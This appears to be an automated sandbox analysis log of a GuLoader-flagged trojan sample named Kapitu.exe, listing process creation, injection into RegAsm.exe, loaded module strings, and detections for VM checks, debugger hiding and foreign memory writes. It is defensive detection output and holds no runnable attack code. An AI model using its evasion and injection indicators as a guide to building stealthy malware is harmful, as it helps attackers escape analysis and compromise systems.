        Source: C:\Users\user\Desktop\Kapitu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Kapitu.exe'
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6972 -s 1356
        Source: C:\Users\user\Desktop\Kapitu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Kapitu.exe' Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6980:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6980:304:WilStaging_02
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6972
        Source: C:\Users\user\Desktop\Kapitu.exeFile created: C:\Users\user\AppData\Local\Temp\~DFAE0A0F3CEED256A7.TMPJump to behavior
        Source: classification engineClassification label: mal84.troj.evad.winEXE@5/4@1/1
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000014.00000003.19040797002.000000000752D000.00000004.00000001.sdmp
        Source: Binary string: CLBCatQ.pdb( source: WerFault.exe, 00000014.00000003.19018976729.0000000006CBA000.00000004.00000001.sdmp
        Source: Binary string: cfgmgr32.pdb( source: WerFault.exe, 00000014.00000003.19001076210.0000000005D92000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdb( source: WerFault.exe, 00000014.00000003.19016612435.00000000068A6000.00000004.00000001.sdmp
        Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.18994554215.00000000030E6000.00000004.00000001.sdmp
        Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000014.00000003.18996243688.00000000064AC000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000014.00000003.18998561649.0000000005D98000.00000004.00000001.sdmp
        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 00000014.00000003.19026340881.00000000070C2000.00000004.00000001.sdmp
        Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.18994746142.00000000030FC000.00000004.00000001.sdmp
        Source: Binary string: RegAsm.pdb source: WerFault.exe, 00000014.00000003.19054366223.00000000053E1000.00000004.00000001.sdmp
        Source: Binary string: wkernel32.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.19001022681.0000000005D87000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.18994350026.0000000003081000.00000004.00000001.sdmp
        Source: Binary string: srvcli.pdbd source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: winnsi.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.18999101834.00000000064C3000.00000004.00000001.sdmp
        Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000014.00000003.19000012560.0000000006895000.00000004.00000001.sdmp
        Source: Binary string: qncryptsslp.pdb source: WerFault.exe, 00000014.00000003.18995486192.0000000005D6E000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb( source: WerFault.exe, 00000014.00000003.18998561649.0000000005D98000.00000004.00000001.sdmp
        Source: Binary string: msi.pdb source: WerFault.exe, 00000014.00000003.19005134690.00000000064BD000.00000004.00000001.sdmp
        Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000014.00000003.19018976729.0000000006CBA000.00000004.00000001.sdmp
        Source: Binary string: winspool.pdb( source: WerFault.exe, 00000014.00000003.18996215101.00000000064A7000.00000004.00000001.sdmp
        Source: Binary string: schannel.pdb source: WerFault.exe, 00000014.00000003.19022355299.00000000070BC000.00000004.00000001.sdmp
        Source: Binary string: urlmon.pdb source: WerFault.exe, 00000014.00000003.19017856487.0000000006F89000.00000004.00000001.sdmp
        Source: Binary string: sfc_os.pdb( source: WerFault.exe, 00000014.00000003.18996243688.00000000064AC000.00000004.00000001.sdmp
        Source: Binary string: crypt32.pdb: source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: mpr.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: bcryptprimitives.pdb( source: WerFault.exe, 00000014.00000003.19020426514.00000000068B1000.00000004.00000001.sdmp
        Source: Binary string: urlmon.pdb( source: WerFault.exe, 00000014.00000003.19017856487.0000000006F89000.00000004.00000001.sdmp
        Source: Binary string: shlwapi.pdbU$ source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: cryptbase.pdb( source: WerFault.exe, 00000014.00000003.19032365056.0000000007588000.00000004.00000001.sdmp
        Source: Binary string: wkernelbase.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: srvcli.pdb source: WerFault.exe, 00000014.00000003.19024960609.0000000006FF2000.00000004.00000001.sdmp
        Source: Binary string: mscoree.pdb source: WerFault.exe, 00000014.00000003.18994396652.0000000003086000.00000004.00000001.sdmp
        Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000014.00000003.19020466166.00000000068B7000.00000004.00000001.sdmp
        Source: Binary string: advapi32.pdb( source: WerFault.exe, 00000014.00000003.18999101834.00000000064C3000.00000004.00000001.sdmp
        Source: Binary string: winspool.pdb source: WerFault.exe, 00000014.00000003.18996215101.00000000064A7000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000014.00000003.19002140835.00000000068CD000.00000004.00000001.sdmp
        Source: Binary string: dpapi.pdb( source: WerFault.exe, 00000014.00000003.19024255597.00000000070D8000.00000004.00000001.sdmp
        Source: Binary string: nsi.pdb source: WerFault.exe, 00000014.00000003.19054366223.00000000053E1000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdb( source: WerFault.exe, 00000014.00000003.19001022681.0000000005D87000.00000004.00000001.sdmp
        Source: Binary string: gpapi.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: rsaenh.pdb( source: WerFault.exe, 00000014.00000003.19040797002.000000000752D000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000014.00000003.18994697722.00000000030F7000.00000004.00000001.sdmp
        Source: Binary string: iertutil.pdb source: WerFault.exe, 00000014.00000003.18999955983.000000000688A000.00000004.00000001.sdmp
        Source: Binary string: msasn1.pdb source: WerFault.exe, 00000014.00000003.19025389900.00000000070D3000.00000004.00000001.sdmp
        Source: Binary string: rasadhlp.pdb( source: WerFault.exe, 00000014.00000003.19030215027.00000000070AF000.00000004.00000001.sdmp
        Source: Binary string: winhttp.pdbv< source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: msvcrt.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.18995486192.0000000005D6E000.00000004.00000001.sdmp
        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000014.00000003.19005718854.000000000689B000.00000004.00000001.sdmp
        Source: Binary string: wuser32.pdb( source: WerFault.exe, 00000014.00000003.18996861577.0000000003102000.00000004.00000001.sdmp
        Source: Binary string: iertutil.pdb7 source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wntdll.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdb( source: WerFault.exe, 00000014.00000003.18999955983.000000000688A000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdb1 source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000014.00000003.18994554215.00000000030E6000.00000004.00000001.sdmp
        Source: Binary string: sfc.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: ncrypt.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: dnsapi.pdbp source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: dpapi.pdb source: WerFault.exe, 00000014.00000003.19024255597.00000000070D8000.00000004.00000001.sdmp
        Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.18994647821.00000000030F1000.00000004.00000001.sdmp
        Source: Binary string: AcLayers.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: netutils.pdb( source: WerFault.exe, 00000014.00000003.19019857478.000000000704F000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdb( source: WerFault.exe, 00000014.00000003.19006946184.00000000064CE000.00000004.00000001.sdmp
        Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000014.00000003.19030215027.00000000070AF000.00000004.00000001.sdmp
        Source: Binary string: netutils.pdb source: WerFault.exe, 00000014.00000003.19019857478.000000000704F000.00000004.00000001.sdmp
        Source: Binary string: rasadhlp.pdbB0 source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: combase.pdb; source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wininet.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wgdi32full.pdb( source: WerFault.exe, 00000014.00000003.18994946811.0000000003113000.00000004.00000001.sdmp
        Source: Binary string: shell32.pdb( source: WerFault.exe, 00000014.00000003.18995383754.0000000005D5D000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdbu source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: winnsi.pdbn source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdb/ source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: msasn1.pdb0 source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: msasn1.pdb( source: WerFault.exe, 00000014.00000003.19025389900.00000000070D3000.00000004.00000001.sdmp
        Source: Binary string: shlwapi.pdb( source: WerFault.exe, 00000014.00000003.18995414777.0000000005D63000.00000004.00000001.sdmp
        Source: Binary string: apphelp.pdb( source: WerFault.exe, 00000014.00000003.18994647821.00000000030F1000.00000004.00000001.sdmp
        Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.18996911288.000000000310D000.00000004.00000001.sdmp
        Source: Binary string: wsspicli.pdb( source: WerFault.exe, 00000014.00000003.19000012560.0000000006895000.00000004.00000001.sdmp
        Source: Binary string: netutils.pdbz source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: shell32.pdb source: WerFault.exe, 00000014.00000003.18995383754.0000000005D5D000.00000004.00000001.sdmp
        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb) source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: mscoree.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: schannel.pdb( source: WerFault.exe, 00000014.00000003.19022355299.00000000070BC000.00000004.00000001.sdmp
        Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000014.00000003.19012140225.00000000070A9000.00000004.00000001.sdmp
        Source: Binary string: wimm32.pdb( source: WerFault.exe, 00000014.00000003.19005081330.00000000064B2000.00000004.00000001.sdmp
        Source: Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.19005081330.00000000064B2000.00000004.00000001.sdmp
        Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: setupapi.pdb source: WerFault.exe, 00000014.00000003.19001051344.0000000005D8D000.00000004.00000001.sdmp
        Source: Binary string: winhttp.pdb source: WerFault.exe, 00000014.00000003.19006667132.00000000068C2000.00000004.00000001.sdmp
        Source: Binary string: Windows.Storage.pdb( source: WerFault.exe, 00000014.00000003.19005718854.000000000689B000.00000004.00000001.sdmp
        Source: Binary string: msi.pdb( source: WerFault.exe, 00000014.00000003.19005134690.00000000064BD000.00000004.00000001.sdmp
        Source: Binary string: sechost.pdb% source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: ntasn1.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: winhttp.pdb( source: WerFault.exe, 00000014.00000003.19006667132.00000000068C2000.00000004.00000001.sdmp
        Source: Binary string: OnDemandConnRouteHelper.pdb source: WerFault.exe, 00000014.00000003.19006628664.00000000068BC000.00000004.00000001.sdmp
        Source: Binary string: combase.pdb( source: WerFault.exe, 00000014.00000003.18995486192.0000000005D6E000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000014.00000003.18994350026.0000000003081000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdb source: WerFault.exe, 00000014.00000003.19016612435.00000000068A6000.00000004.00000001.sdmp
        Source: Binary string: msvcrt.pdb( source: WerFault.exe, 00000014.00000003.18994746142.00000000030FC000.00000004.00000001.sdmp
        Source: Binary string: setupapi.pdb( source: WerFault.exe, 00000014.00000003.19001051344.0000000005D8D000.00000004.00000001.sdmp
        Source: Binary string: mskeyprotect.pdb( source: WerFault.exe, 00000014.00000003.19026340881.00000000070C2000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdbS source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: apphelp.pdbO$ source: WerFault.exe, 00000014.00000003.19054478670.00000000055A0000.00000004.00000040.sdmp
        Source: Binary string: WLDP.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: sfc_os.pdbG source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: mscoree.pdb( source: WerFault.exe, 00000014.00000003.18994396652.0000000003086000.00000004.00000001.sdmp
        Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 00000014.00000003.19030119844.000000000769F000.00000004.00000001.sdmp
        Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000014.00000003.19022770808.00000000068C7000.00000004.00000001.sdmp
        Source: Binary string: wintrust.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: mskeyprotect.pdb# source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: CLBCatQ.pdb] source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb( source: WerFault.exe, 00000014.00000003.19025355341.00000000070CD000.00000004.00000001.sdmp
        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.19007270851.00000000068AB000.00000004.00000001.sdmp
        Source: Binary string: AcLayers.pdb( source: WerFault.exe, 00000014.00000003.18994697722.00000000030F7000.00000004.00000001.sdmp
        Source: Binary string: urlmon.pdbX* source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: srvcli.pdb( source: WerFault.exe, 00000014.00000003.19024960609.0000000006FF2000.00000004.00000001.sdmp
        Source: Binary string: psapi.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: ws2_32.pdb( source: WerFault.exe, 00000014.00000003.19020466166.00000000068B7000.00000004.00000001.sdmp
        Source: Binary string: setupapi.pdbK source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000014.00000003.19032365056.0000000007588000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdbL6 source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: wgdi32.pdb( source: WerFault.exe, 00000014.00000003.18996911288.000000000310D000.00000004.00000001.sdmp
        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.19020426514.00000000068B1000.00000004.00000001.sdmp
        Source: Binary string: OnDemandConnRouteHelper.pdb( source: WerFault.exe, 00000014.00000003.19006628664.00000000068BC000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb( source: WerFault.exe, 00000014.00000003.19002140835.00000000068CD000.00000004.00000001.sdmp
        Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.18995443411.0000000005D68000.00000004.00000001.sdmp
        Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.18996861577.0000000003102000.00000004.00000001.sdmp
        Source: Binary string: cfgmgr32.pdbA source: WerFault.exe, 00000014.00000003.19054531992.00000000055A8000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb source: WerFault.exe, 00000014.00000003.19025355341.00000000070CD000.00000004.00000001.sdmp

        Data Obfuscation:

        barindex
        Yara detected GuLoaderShow sources
        Source: Yara matchFile source: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000000.18979643782.0000000001100000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000000.18969783001.0000000001100000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\Kapitu.exeCode function: 1_2_00403C75 pushfd ; retf 1_2_00403C76
        Source: C:\Users\user\Desktop\Kapitu.exeCode function: 1_2_0040487A push esp; iretd 1_2_00404843
        Source: C:\Users\user\Desktop\Kapitu.exeCode function: 1_2_0040480A push esp; iretd 1_2_00404843
        Source: C:\Users\user\Desktop\Kapitu.exeCode function: 1_2_00405F60 push ss; retf 1_2_00405F68
        Source: C:\Users\user\Desktop\Kapitu.exeCode function: 1_2_00404F20 push 00000016h; ret 1_2_00404F28
        Source: C:\Users\user\Desktop\Kapitu.exeCode function: 1_2_004033DC push eax; ret 1_2_004033E9
        Source: C:\Users\user\Desktop\Kapitu.exeCode function: 1_2_023B5237 push edi; ret 1_2_023B5238
        Source: C:\Users\user\Desktop\Kapitu.exeCode function: 1_2_023B2A79 push ss; iretd 1_2_023B2A7A
        Source: C:\Users\user\Desktop\Kapitu.exeCode function: 1_2_023B3EE8 push es; ret 1_2_023B3EEE
        Source: C:\Users\user\Desktop\Kapitu.exeCode function: 1_2_023B6573 pushfd ; iretd 1_2_023B6574
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_01102F3E push ebx; iretd 5_2_01102FEF
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0110652C pushad ; ret 5_2_01106530
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_01102F88 push ebx; iretd 5_2_01102FEF
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_011049BD push edx; retf 5_2_011049D1
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_01102BFC push edi; retf 5_2_01102C3F
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_011007E5 push ecx; retf 5_2_011007E6
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_01102C34 push edi; retf 5_2_01102C3F
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_01102EF9 push ebx; iretd 5_2_01102FEF
        Source: C:\Users\user\Desktop\Kapitu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion:

        barindex
        Tries to detect Any.runShow sources
        Source: C:\Users\user\Desktop\Kapitu.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Users\user\Desktop\Kapitu.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: Kapitu.exe, 00000001.00000002.17009789446.0000000002C60000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
        Source: Kapitu.exe, 00000001.00000002.17009789446.0000000002C60000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.19110033599.00000000012D0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: Kapitu.exe, 00000001.00000002.17008948712.00000000006E4000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6976Thread sleep time: -225000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\Kapitu.exeSystem information queried: ModuleInformationJump to behavior
        Source: Kapitu.exe, 00000001.00000002.17009789446.0000000002C60000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe\syswow64\msvbvm60.dll
        Source: WerFault.exe, 00000014.00000002.19103847524.0000000003038000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWX
        Source: RegAsm.exe, 00000005.00000000.18970661644.0000000001552000.00000004.00000020.sdmp, WerFault.exe, 00000014.00000003.19097226827.000000000310F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
        Source: Kapitu.exe, 00000001.00000002.17009789446.0000000002C60000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.19110033599.00000000012D0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: RegAsm.exe, 00000005.00000000.18980291890.00000000014E8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
        Source: Kapitu.exe, 00000001.00000002.17008948712.00000000006E4000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: WerFault.exe, 00000014.00000003.19097153114.0000000003105000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWC

        Anti Debugging:

        barindex
        Hides threads from debuggersShow sources
        Source: C:\Users\user\Desktop\Kapitu.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_01109717 mov eax, dword ptr fs:[00000030h]5_2_01109717
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0110CD70 mov eax, dword ptr fs:[00000030h]5_2_0110CD70
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0110E3A7 mov eax, dword ptr fs:[00000030h]5_2_0110E3A7
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0110D408 mov eax, dword ptr fs:[00000030h]5_2_0110D408
        Source: C:\Users\user\Desktop\Kapitu.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess queried: DebugPortJump to behavior

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\Desktop\Kapitu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 1100000Jump to behavior
        Source: C:\Users\user\Desktop\Kapitu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Kapitu.exe' Jump to behavior
        Source: RegAsm.exe, 00000005.00000000.18981440245.0000000001970000.00000002.00020000.sdmpBinary or memory string: Program Manager
